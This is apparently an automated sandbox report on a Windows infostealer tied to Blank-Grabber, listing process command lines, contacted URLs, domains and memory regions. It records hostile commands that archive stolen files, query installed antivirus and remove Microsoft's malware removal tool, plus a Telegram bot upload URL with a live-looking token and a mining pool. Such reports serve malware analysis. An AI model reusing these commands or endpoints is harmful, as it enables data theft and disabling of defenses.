malicious
C:\Windows\System32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
malicious
C:\Windows\explorer.exe
explorer.exe
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI68522\rar.exe a -r -hp"dextycraxscloud" "C:\Users\user\AppData\Local\Temp\dRGk3.zip" *"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\tasklist.exe
tasklist /FO LIST
C:\Windows\System32\tasklist.exe
tasklist /FO LIST
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\wbem\WMIC.exe
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\tree.com
tree /A /F
C:\Windows\System32\tasklist.exe
tasklist /FO LIST
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\tree.com
tree /A /F
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\tree.com
tree /A /F
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\tree.com
tree /A /F
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES8576.tmp" "c:\Users\user\AppData\Local\Temp\yidhhzbx\CSCA27ED749AA364CCD94BFD566BA81531.TMP"
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\tree.com
tree /A /F
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\tree.com
tree /A /F
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
There are 105 hidden processes, click here to show them.

URLs

Name
IP
Malicious
https://api.telegram.org/bot5909479554:AAHBh0elmAGqD01xNsl_4RAIClCAhxA3CaI/sendDocument
149.154.167.220
malicious
https://github.com/Blank-c/BlankOBF
unknown
https://api.telegram.org/bot%s/%s
unknown
https://www.avito.ru/
unknown
https://api.telegram.org/bot%s/%sp~
unknown
https://github.com/Blank-c/Blank-Grabberi
unknown
http://www.micom/pkiops/Docs/ry.htm0
unknown
http://ip-api.com/line/?fields=hostingr=r
unknown
https://python.org/dev/peps/pep-0263/
unknown
https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#
unknown
https://www.leboncoin.fr/
unknown
https://tools.ietf.org/html/rfc2388#section-4.4
unknown
https://weibo.com/
unknown
https://api.anonfiles.com/upload
unknown
https://www.msn.com
unknown
https://nuget.org/nuget.exe
unknown
https://discord.com/api/v9/users/
unknown
https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://www.amazon.ca/
unknown
https://docs.python.org/3/library/importlib.html#importlib.abc.ExecutionLoader.get_filename
unknown
https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy
unknown
https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688
unknown
http://pesterbdd.com/images/Pester.png
unknown
http://schemas.xmlsoap.org/soap/encoding/
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_code
unknown
https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader
unknown
https://www.amazon.com/
unknown
https://contoso.com/Icon
unknown
https://httpbin.org/
unknown
http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
unknown
https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.exec_module
unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
unknown
https://docs.python.org/3/library/importlib.html#importlib.abc.MetaPathFinder.invalidate_caches
unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
unknown
https://github.com/Pester/Pester
unknown
http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535
unknown
https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy
unknown
https://MD8.mozilla.org/1/m
unknown
https://api.gofile.io/getServerr=r
unknown
https://bugzilla.mo
unknown
http://tools.ietf.org/html/rfc6125#section-6.4.3
unknown
https://api.telegram.org/bot%s/%s)
unknown
http://schemas.xmlsoap.org/wsdl/
unknown
https://google.com/mail
unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
unknown
https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py
unknown
https://www.google.com/
unknown
https://foss.heptapod.net/pypy/pypy/-/issues/3539
unknown
https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.
unknown
http://google.com/
unknown
https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
unknown
http://ocsp.sectigo.com0
unknown
https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warningssm0
unknown
https://www.python.org/download/releases/2.3/mro/.
unknown
https://contoso.com/License
unknown
https://discordapp.com/api/v9/users/
unknown
https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_source
unknown
http://csrc.nist.gov/publications/nistpubs/800(
unknown
http://ip-api.com/line/?fields=hostingr=
unknown
http://ip-api.com/json/?fields=225545r
unknown
https://docs.python.org/3/library/importlib.html#importlib.abc.PathEntryFinder.find_spec
unknown
https://github.com/urllib3/urllib3/issues/2920
unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
unknown
https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warningsD
unknown
http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
unknown
https://docs.python.org/3/library/importlib.html#importlib.abc.ResourceLoader.get_data
unknown
https://yahoo.com/
unknown
https://account.bellmedia.c
unknown
http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6
unknown
https://login.microsoftonline.com
unknown
http://cacerts.digicert.co
unknown
http://crl.thawte.com/ThawteTimestampingCA.crl0
unknown
https://html.spec.whatwg.org/multipage/
unknown
https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warnings
unknown
https://www.zhihu.com/
unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
unknown
https://www.rfc-editor.org/rfc/rfc8259#section-8.1
unknown
https://contoso.com/
unknown
https://github.com/Unidata/MetPy/bl
unknown
https://api.gofile.io/getServer
unknown
https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.png
unknown
http://nuget.org/NuGet.exe
unknown
https://github.com/urllib3/urllib3/issues/2920n
unknown
https://login.mic
unknown
https://sectigo.com/CPS0
unknown
https://github.com/Blank-c/Blank-GrabberrV
unknown
https://www.amazon.co.uk/
unknown
http://ocsp.thawte.com0
unknown
https://api.gofile.io/getServerr=
unknown
https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.pngz
unknown
https://json.org
unknown
https://www.python.org/dev/peps/pep-0205/
unknown
https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.is_package
unknown
https://twitter.com/
unknown
https://www.olx.pl/
unknown
https://support.mozilla.org/products/firefox
unknown
https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.create_module
unknown
https://google.com/
unknown
There are 90 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
pool.hashvault.pro
45.76.89.70
malicious
api.telegram.org
149.154.167.220
malicious
ip-api.com
208.95.112.1

IPs

IP
Domain
Country
Malicious
45.76.89.70
pool.hashvault.pro
United States
malicious
149.154.167.220
api.telegram.org
United Kingdom
malicious
208.95.112.1
ip-api.com
United States

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\MRT
DontOfferThroughWUAU
HKEY_CURRENT_USER_Classes\Local Settings\MuiCache\24\417C44EB
@%SystemRoot%\system32\mlang.dll,-4387
HKEY_CURRENT_USER_Classes\Local Settings\MuiCache\24\417C44EB
@%SystemRoot%\system32\mlang.dll,-4407

Memdumps

Base Address
Regiontype
Protect
Malicious
19DCB065000
heap
page read and write
malicious
2D8F5F80000
direct allocation
page read and write
malicious
972000
unkown
page readonly
malicious
2D8F6B8A000
heap
page read and write
malicious
2D8F6114000
heap
page read and write
malicious
2D8F6364000
heap
page read and write
malicious
2D8F6139000
heap
page read and write
malicious
19DCB063000
heap
page read and write
malicious
2D8F6364000
heap
page read and write
malicious
3250000
heap
page read and write
malicious
1E00446E000
trusted library allocation
page read and write
181AD7AB000
heap
page read and write
2D8F5DB9000
heap
page read and write
7FFE1031A000
unkown
page execute and read and write
2D8F64EF000
heap
page read and write
121C0000
trusted library allocation
page read and write
19CBBB44000
heap
page read and write
16A0000
trusted library allocation
page read and write
2D8F6496000
heap
page read and write
1A6018FD000
heap
page read and write
2D8F69F0000
direct allocation
page read and write
278CA9F9000
heap
page read and write
21901A4A000
trusted library allocation
page read and write
1DDF000
heap
page read and write
69F000
unkown
page readonly
7FFE12E10000
unkown
page readonly
219181E4000
heap
page read and write
7FFD9B110000
trusted library allocation
page read and write
2D8F63D4000
heap
page read and write
19CBBB83000
heap
page read and write
19DCB061000
heap
page read and write
2D8F63DA000
heap
page read and write
1316000
heap
page read and write
1D6A000
heap
page read and write
2D8F3C5A000
heap
page read and write
19CBBDBB000
heap
page read and write
2D8F6320000
heap
page read and write
215A32DC000
heap
page read and write
2D8F5DFA000
heap
page read and write
2D8F64BC000
heap
page read and write
21014FC0000
heap
page read and write
265318A1000
heap
page read and write
16A0000
trusted library allocation
page read and write
28A222E0000
heap
page read and write
1E01AB4E000
heap
page read and write
7FFE01301000
unkown
page execute and read and write
21901B32000
trusted library allocation
page read and write
2D8F64CA000
heap
page read and write
215A32CD000
heap
page read and write
2D8F60C9000
heap
page read and write
2D8F6A08000
direct allocation
page read and write
2D8F6678000
heap
page read and write
282B6255000
heap
page read and write
2D8F658A000
heap
page read and write
2E4A9A92000
heap
page read and write
2D8F6483000
heap
page read and write
20DBCBC6000
heap
page read and write
7FFD9AFF0000
trusted library allocation
page read and write
B53330E000
stack
page read and write
16A0000
trusted library allocation
page read and write
7FFDFB005000
unkown
page execute and read and write
256F2C37000
heap
page read and write
515D000
trusted library allocation
page read and write
1DA4000
heap
page read and write
937AAFF000
stack
page read and write
2D8F64A4000
heap
page read and write
282ACFA0000
heap
page read and write
20871375000
heap
page read and write
19CBC27C000
heap
page read and write
C60096E000
stack
page read and write
121C0000
trusted library allocation
page read and write
215A32B7000
heap
page read and write
2D8F6658000
heap
page read and write
181B0BC0000
direct allocation
page read and write
7FFE0EB6D000
unkown
page read and write
121C0000
trusted library allocation
page read and write
16A0000
trusted library allocation
page read and write
278963A0000
heap
page read and write
201E0270000
heap
page read and write
2D8F6678000
heap
page read and write
20DBCBB8000
heap
page read and write
282B62B1000
heap
page read and write
2D8F3CAC000
heap
page read and write
7FFD9AD00000
trusted library allocation
page read and write
1D10000
heap
page read and write
7FFD9B000000
trusted library allocation
page read and write
2D8F6E5E000
heap
page read and write
7FFE11525000
unkown
page execute and read and write
1E012CBF000
trusted library allocation
page read and write
2D8F64D1000
heap
page read and write
28A222E5000
heap
page read and write
2D8F3C85000
heap
page read and write
7FF623F71000
unkown
page execute read
2070D460000
heap
page read and write
2D8F64C2000
heap
page read and write
2D8F647D000
heap
page read and write
181AD81C000
heap
page read and write
E3D2CFF000
stack
page read and write
2D8F63A4000
heap
page read and write
16A0000
trusted library allocation
page read and write
2D8F64BC000
heap
page read and write
1E0025F4000
heap
page read and write
2D8F649B000
heap
page read and write
7FFDFA221000
unkown
page execute and read and write
2D8F5E01000
heap
page read and write
7FFD9ADB6000
trusted library allocation
page read and write
21645ADC000
heap
page read and write
2D8F6623000
heap
page read and write
215A34B4000
heap
page read and write
2D8F64CD000
heap
page read and write
1F72EF00000
heap
page read and write
7D9FFFF000
stack
page read and write
28A22059000
heap
page read and write
2D8F5DE3000
heap
page read and write
7FFD9ADB0000
trusted library allocation
page read and write
2D8F5E6B000
heap
page read and write
1E002550000
heap
page read and write
282ACFC1000
heap
page read and write
2D8F6614000
heap
page read and write
2AF86490000
heap
page read and write
19DCB061000
heap
page read and write
C600CFF000
stack
page read and write
518F000
trusted library allocation
page read and write
E62000
trusted library allocation
page read and write
2D8F55F4000
heap
page read and write
303998C000
stack
page read and write
121C0000
trusted library allocation
page read and write
2D8F64B0000
heap
page read and write
1D90000
heap
page read and write
26D676C000
stack
page read and write
2D8F64CA000
heap
page read and write
27CC37C0000
heap
page read and write
5F65DFE000
stack
page read and write
121C0000
trusted library allocation
page read and write
121C0000
trusted library allocation
page read and write
181AD7CA000
heap
page read and write
16A0000
trusted library allocation
page read and write
19CBBC10000
heap
page read and write
4800000
direct allocation
page read and write
28A22061000
heap
page read and write
2D8F661A000
heap
page read and write
2D8F6630000
heap
page read and write
2D8F6496000
heap
page read and write
7FFDFA111000
unkown
page execute and read and write
2197FD20000
heap
page read and write
7FF63426E000
unkown
page readonly
B5325BE000
stack
page read and write
16A0000
trusted library allocation
page read and write
16A0000
trusted library allocation
page read and write
167E803B000
heap
page read and write
121C0000
trusted library allocation
page read and write
19CBBDE4000
heap
page read and write
2D8F3C86000
heap
page read and write
21901A0B000
trusted library allocation
page read and write
2D8F6D15000
heap
page read and write
121C0000
trusted library allocation
page read and write
196D8B24000
heap
page read and write
2197E0A0000
heap
page read and write
2D8F64CA000
heap
page read and write
19DCB061000
heap
page read and write
2D8F64C4000
heap
page read and write
2D8F64C6000
heap
page read and write
2D8F3C5A000
heap
page read and write
2D8F6614000
heap
page read and write
1A49C5C0000
heap
page read and write
7FFD9B090000
trusted library allocation
page read and write
2D8F64A1000
heap
page read and write
7FFD9B0A0000
trusted library allocation
page read and write
2D8F6644000
heap
page read and write
19DCB061000
heap
page read and write
1FE983CD000
heap
page read and write
1E01AC23000
heap
page read and write
7000000
direct allocation
page read and write
1FE983C7000
heap
page read and write
181AD7AA000
heap
page read and write
2BBC000
stack
page read and write
181AD9B0000
direct allocation
page read and write
20DBCBB8000
heap
page read and write
2625EAE0000
heap
page read and write
2D8F64C6000
heap
page read and write
2D8F64C2000
heap
page read and write
19DCB061000
heap
page read and write
256E8AC0000
heap
page read and write
21E8EE8D000
heap
page read and write
7FFDFB272000
unkown
page execute and read and write
16A0000
trusted library allocation
page read and write
19CBBDBA000
heap
page read and write
16A0000
trusted library allocation
page read and write
E56000
trusted library allocation
page execute and read and write
2D8F63B5000
heap
page read and write
4C2DAFF000
stack
page read and write
12140000
trusted library allocation
page read and write
2D8F6440000
heap
page read and write
2D8F64C4000
heap
page read and write
CF130FE000
stack
page read and write
2D8F64D5000
heap
page read and write
5130000
trusted library allocation
page read and write
1C378720000
heap
page read and write
4315BED000
stack
page read and write
1F72EC90000
heap
page read and write
121C0000
trusted library allocation
page read and write
2D8F60DF000
heap
page read and write
7FFDFAF91000
unkown
page execute and write copy
9CFF31C000
stack
page read and write
2AF862AB000
heap
page read and write
16A0000
trusted library allocation
page read and write
278CA9F0000
heap
page read and write
7FFD9B170000
trusted library allocation
page read and write
215A32DC000
heap
page read and write
121C0000
trusted library allocation
page read and write
7FFE13330000
unkown
page readonly
2D8F5DA1000
heap
page read and write
2625EB10000
heap
page read and write
2D8F3C54000
heap
page read and write
2E4A9A8D000
heap
page read and write
7FF633FE0000
unkown
page readonly
121C0000
trusted library allocation
page read and write
21EE57F0000
heap
page read and write
7FFE126D1000
unkown
page execute and read and write
2197E901000
heap
page read and write
1A60187A000
heap
page read and write
2D8F3CA2000
heap
page read and write
181B0DE0000
direct allocation
page read and write
2D8F3C5B000
heap
page read and write
181AD7B0000
heap
page read and write
121C0000
trusted library allocation
page read and write
16A0000
trusted library allocation
page read and write
19CBBDEA000
heap
page read and write
2D8F665B000
heap
page read and write
266C29B8000
heap
page read and write
19DCB061000
heap
page read and write
2D8F6450000
heap
page read and write
266C29C7000
heap
page read and write
B5323FE000
stack
page read and write
7FFDFB2E5000
unkown
page execute and read and write
21EE58B0000
heap
page read and write
19CBC27C000
heap
page read and write
B53328E000
stack
page read and write
2D8F6E1D000
heap
page read and write
7FFD9B0E0000
trusted library allocation
page read and write
121C0000
trusted library allocation
page read and write
7FFD9AF40000
trusted library allocation
page read and write
1DC70E51000
heap
page read and write
1D9206A1000
heap
page read and write
167E8051000
heap
page read and write
19DCB06D000
heap
page read and write
2D8F6375000
heap
page read and write
121C0000
trusted library allocation
page read and write
2D8F6468000
heap
page read and write
21900F48000
trusted library allocation
page read and write
2D8F72E4000
direct allocation
page read and write
12140000
trusted library allocation
page read and write
21E8EE99000
heap
page read and write
2D8F64FA000
heap
page read and write
7A00000
direct allocation
page read and write
1F52EEA0000
heap
page read and write
375E3FF000
unkown
page read and write
121C0000
trusted library allocation
page read and write
181AD7D3000
heap
page read and write
2D8F5DE3000
heap
page read and write
24310B20000
heap
page read and write
21645AA7000
heap
page read and write
2D8F63D7000
heap
page read and write
20DBCB93000
heap
page read and write
1E002E85000
trusted library allocation
page read and write
181AD980000
heap
page read and write
219186E8000
heap
page read and write
2D8F3C60000
heap
page read and write
22156720000
heap
page read and write
1E002420000
trusted library allocation
page read and write
2D8F59CC000
direct allocation
page read and write
256F2C3B000
heap
page read and write
7FF77203E000
unkown
page readonly
215A32A5000
heap
page read and write
219010F3000
trusted library allocation
page read and write
29532521000
heap
page read and write
201E0310000
heap
page read and write
E3D000
trusted library allocation
page execute and read and write
2D8F6472000
heap
page read and write
F7F97F000
stack
page read and write
2D8F5E42000
heap
page read and write
12140000
trusted library allocation
page read and write
2D8F64A4000
heap
page read and write
2D8F64E7000
heap
page read and write
16A0000
trusted library allocation
page read and write
7FFE12E1C000
unkown
page read and write
167E8310000
heap
page read and write
8677D7F000
stack
page read and write
21645A80000
heap
page read and write
17A51824000
heap
page read and write
400000
unkown
page readonly
2D8F661E000
heap
page read and write
2D8F6466000
heap
page read and write
F22B3FF000
stack
page read and write
2D8F6275000
heap
page read and write
21902009000
trusted library allocation
page read and write
A3551FE000
stack
page read and write
2A00000
direct allocation
page read and write
7FFD9AD14000
trusted library allocation
page read and write
121C0000
trusted library allocation
page read and write
2625EAFB000
heap
page read and write
7FFD9B060000
trusted library allocation
page read and write
2D8F6648000
heap
page read and write
19CBBB56000
heap
page read and write
219001C0000
heap
page execute and read and write
2D8F6350000
heap
page read and write
16A0000
trusted library allocation
page read and write
7FFD9AFC0000
trusted library allocation
page read and write
2D8F6644000
heap
page read and write
26D6AFF000
unkown
page read and write
7FF634269000
unkown
page read and write
A40000
heap
page read and write
1E002500000
heap
page execute and read and write
2D8F6468000
heap
page read and write
7FFDFB628000
unkown
page execute and read and write
290CCFC000
stack
page read and write
2191869B000
heap
page read and write
121C0000
trusted library allocation
page read and write
16A0000
trusted library allocation
page read and write
7FFE01477000
unkown
page read and write
16A0000
trusted library allocation
page read and write
21918902000
heap
page read and write
21015040000
heap
page read and write
2D199F40000
heap
page read and write
2D8F665F000
heap
page read and write
7FFD9AD10000
trusted library allocation
page read and write
2D8F64D5000
heap
page read and write
2D8F5D86000
heap
page read and write
282B62B1000
heap
page read and write
2E4A9A7B000
heap
page read and write
2197E100000
heap
page read and write
2D8F64DA000
heap
page read and write
256F2A90000
heap
page read and write
1B091960000
heap
page read and write
121C0000
trusted library allocation
page read and write
12140000
trusted library allocation
page read and write
4C2D876000
stack
page read and write
7FFE0145C000
unkown
page execute and read and write
2D8F6483000
heap
page read and write
DD6000
heap
page read and write
1A6018BF000
heap
page read and write
2D8F6F6C000
heap
page read and write
2D8F6408000
heap
page read and write
7FFE10300000
unkown
page readonly
2D8F72D8000
direct allocation
page read and write
16A0000
trusted library allocation
page read and write
181AD670000
heap
page read and write
2D8F3C2F000
heap
page read and write
16A0000
trusted library allocation
page read and write
2D8F3C60000
heap
page read and write
2D8F649C000
heap
page read and write
16A0000
trusted library allocation
page read and write
2D8F6638000
heap
page read and write
2D8F5E41000
heap
page read and write
16A0000
trusted library allocation
page read and write
2D8F3C54000
heap
page read and write
13DF6C61000
heap
page read and write
F7F87F000
stack
page read and write
2D8F6478000
heap
page read and write
167E7FD0000
heap
page read and write
23DAA190000
heap
page read and write
282ACFAA000
heap
page read and write
181AD7F1000
heap
page read and write
F0263FF000
stack
page read and write
2197EBA0000
heap
page read and write
266C28D0000
heap
page read and write
2D8F6634000
heap
page read and write
E3D2BFE000
unkown
page read and write
B5322FE000
stack
page read and write
21645920000
heap
page read and write
2D8F64AE000
heap
page read and write
A10000
heap
page read and write
21E8EEA6000
heap
page read and write
7FF771DB1000
unkown
page execute read
2E4A9A8D000
heap
page read and write
1FE98320000
heap
page read and write
2D8F64EF000
heap
page read and write
3039DFF000
stack
page read and write
19CBBB6C000
heap
page read and write
20DBCD50000
heap
page read and write
B5326BE000
stack
page read and write
23A0FE70000
heap
page read and write
7FFE13321000
unkown
page execute and write copy
B531DC3000
stack
page read and write
12140000
trusted library allocation
page read and write
7FFE1031C000
unkown
page execute and write copy
21901FBE000
trusted library allocation
page read and write
266C2B64000
heap
page read and write
7FF771DBA000
unkown
page readonly
69F000
unkown
page readonly
23DAA280000
heap
page read and write
21EE5BD0000
heap
page read and write
140000000
unkown
page read and write
21900F21000
trusted library allocation
page read and write
F0EA3BF000
stack
page read and write
780000
heap
page read and write
2D8F6472000
heap
page read and write
2D8F64CA000
heap
page read and write
28A222E4000
heap
page read and write
19CBC281000
heap
page read and write
17A51519000
heap
page read and write
19DCB061000
heap
page read and write
2D8F64CA000
heap
page read and write
236FE210000
unkown
page read and write
EA0000
heap
page read and write
A6E000
heap
page read and write
85445DC000
stack
page read and write
2D8F64C2000
heap
page read and write
2D8F646C000
heap
page read and write
266C2AB0000
heap
page read and write
16A0000
trusted library allocation
page read and write
1C34C450000
unkown
page read and write
B532638000
stack
page read and write
221566C0000
heap
page read and write
2E4A9A8D000
heap
page read and write
2B7E000
stack
page read and write
7FF623FB4000
unkown
page readonly
2D8F64E7000
heap
page read and write
2D8F5D9E000
heap
page read and write
12A1000
heap
page read and write
28A222F0000
heap
page read and write
2D8F6658000
heap
page read and write
7FFD9B058000
trusted library allocation
page read and write
2D8F6658000
heap
page read and write
121C0000
trusted library allocation
page read and write
1E012B8C000
trusted library allocation
page read and write
16A0000
trusted library allocation
page read and write
2D8F6C0D000
heap
page read and write
2D8F5E51000
heap
page read and write
17A51430000
heap
page read and write
16A0000
trusted library allocation
page read and write
7FFD9AED8000
trusted library allocation
page read and write
2E4A9A8D000
heap
page read and write
2D8F64D1000
heap
page read and write
21E8F057000
heap
page read and write
2D8F3C60000
heap
page read and write
2D8F3C5E000
heap
page read and write
16A0000
trusted library allocation
page read and write
20DBCC70000
heap
page read and write
181AD805000
heap
page read and write
2D8F5DA0000
heap
page read and write
121C0000
trusted library allocation
page read and write
121C0000
trusted library allocation
page read and write
2D8F60B5000
heap
page read and write
2D8F6641000
heap
page read and write
2D8F7374000
heap
page read and write
1E01AD60000
heap
page read and write
400000
unkown
page readonly
24310E00000
heap
page read and write
1FE98300000
heap
page read and write
7FFDFAEE1000
unkown
page execute and read and write
181AD7C1000
heap
page read and write
2D8F647D000
heap
page read and write
2D8F64A4000
heap
page read and write
2D8F6443000
heap
page read and write
2D8F3C86000
heap
page read and write
2D8F64C6000
heap
page read and write
1A6018C1000
heap
page read and write
2D8F64A6000
heap
page read and write
1E000A40000
heap
page read and write
19DCB061000
heap
page read and write
2E4A9A55000
heap
page read and write
7FFD9AF30000
trusted library allocation
page read and write
2D8F647F000
heap
page read and write
2D8F613F000
heap
page read and write
1D50000
heap
page read and write
181B0BE0000
direct allocation
page read and write
19DCB061000
heap
page read and write
21645ACB000
heap
page read and write
7FFDFB739000
unkown
page execute and read and write
83D6EFB000
stack
page read and write
2D8F5E51000
heap
page read and write
2D8F5E6B000
heap
page read and write
21EE58BB000
heap
page read and write
2D8F647F000
heap
page read and write
2E4A9A80000
heap
page read and write
7FFE126F3000
unkown
page execute and read and write
2D8F64C6000
heap
page read and write
12140000
trusted library allocation
page read and write
2E4A9A88000
heap
page read and write
2D8F5DD2000
heap
page read and write
181AD984000
heap
page read and write
2D8F6453000
heap
page read and write
340997E000
stack
page read and write
2D8F646F000
heap
page read and write
1DC70D90000
heap
page read and write
1A6018C6000
heap
page read and write
181B0D52000
direct allocation
page read and write
2D8F5E51000
heap
page read and write
2D8F6408000
heap
page read and write
1F52EDD0000
heap
page read and write
181AD81D000
heap
page read and write
286A51C0000
heap
page read and write
2D8F5DF5000
heap
page read and write
286A5555000
heap
page read and write
7FFE10262000
unkown
page execute and read and write
D37000
stack
page read and write
1E01AC41000
heap
page read and write
181AD7AA000
heap
page read and write
7FFDFB1F0000
unkown
page execute and read and write
2D8F3C84000
heap
page read and write
7FFDFAFAD000
unkown
page execute and read and write
7FFE10242000
unkown
page execute and write copy
19A000
stack
page read and write
AAA76FF000
stack
page read and write
2197E1C6000
heap
page read and write
282B6290000
heap
page read and write
7FF623F70000
unkown
page readonly
181AD7CC000
heap
page read and write
2E4A9A8D000
heap
page read and write
1F72ED51000
heap
page read and write
1D0E000
stack
page read and write
1DC70E51000
heap
page read and write
121C0000
trusted library allocation
page read and write
121C0000
trusted library allocation
page read and write
2D8F5D81000
heap
page read and write
27CC3735000
heap
page read and write
12B9000
heap
page read and write
1A6018A3000
heap
page read and write
20DBCB93000
heap
page read and write
2E4A9A8B000
heap
page read and write
7FFD9ADA0000
trusted library allocation
page read and write
2D8F63B1000
heap
page read and write
E3D2AFC000
stack
page read and write
19CBBDBE000
heap
page read and write
B5327BC000
stack
page read and write
2D8F6498000
heap
page read and write
2D8F65FA000
heap
page read and write
7FFE11511000
unkown
page execute and read and write
121C0000
trusted library allocation
page read and write
2D8F3C86000
heap
page read and write
121C0000
trusted library allocation
page read and write
970000
unkown
page readonly
2D8F64AE000
heap
page read and write
27CC37AB000
heap
page read and write
2D8F6093000
heap
page read and write
